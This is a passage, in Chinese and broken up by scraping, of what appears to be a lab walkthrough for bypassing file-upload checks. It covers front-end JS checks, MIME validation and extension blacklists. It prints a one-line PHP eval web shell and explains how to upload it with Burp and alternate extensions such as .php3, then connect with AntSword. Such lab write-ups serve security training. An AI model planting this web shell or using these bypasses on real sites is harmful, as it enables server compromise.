赞
踩
jpg
的文件,文件内容为一句话木马<?php @eval($_POST[123]);?>
使用burp
抓包并修改文件后缀为php
,即可上传成功JS
检查的代码,即可将php
木马文件直接上传。MIME
验证,分析源码,可以通过burp
抓包修改数据包的第二个content-type
,并查看响应。
3. 拖拽点击上传成功的图片木马,看到php
配置页面即可说明上传成功。
4. 使用上述同样方法上传一句话木马,使用蚁剑连接即可。
查看题目源码用黑名单不允许上传.asp,.aspx,.php,.jsp后缀的文件
尝试直接上传一个文件后缀为jpg
的一句话木马文件,拖拽点击图片,发现提示错误显示。
基于文件后缀验证名验证方式的分类:
①基于白名单验证:只针对白名单中有的后缀名,文件才能上传成功。
②基于黑名单验证:只针对黑名单中没有的后缀名,文件才能上传成功。
用黑名单不允许上传.asp,.aspx,.php,.jsp
后缀的文件,但可以上传.phtml、 .php3 .php5、php4、 .pht、php1、php2、phps
【这些后缀会被当成php文件解析】等等。
由于环境是phpstudy
搭建,其中限制了后缀,需要在目录D:\PhpStudy2018\PHPTutorial\Apache\conf
下将#AddType application/x-httpd-php.php.phtml
改为AddType application/x-httpd-php.php.phtml.php3.php4.php5
(记得去掉“#”)
上传文件后缀为php3
的内容为<?php phpinfo();?>
的文件,出现php
配置页面即可说明上传成功。
使用上述同样方法上传一句话木马,使用蚁剑连接即可。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。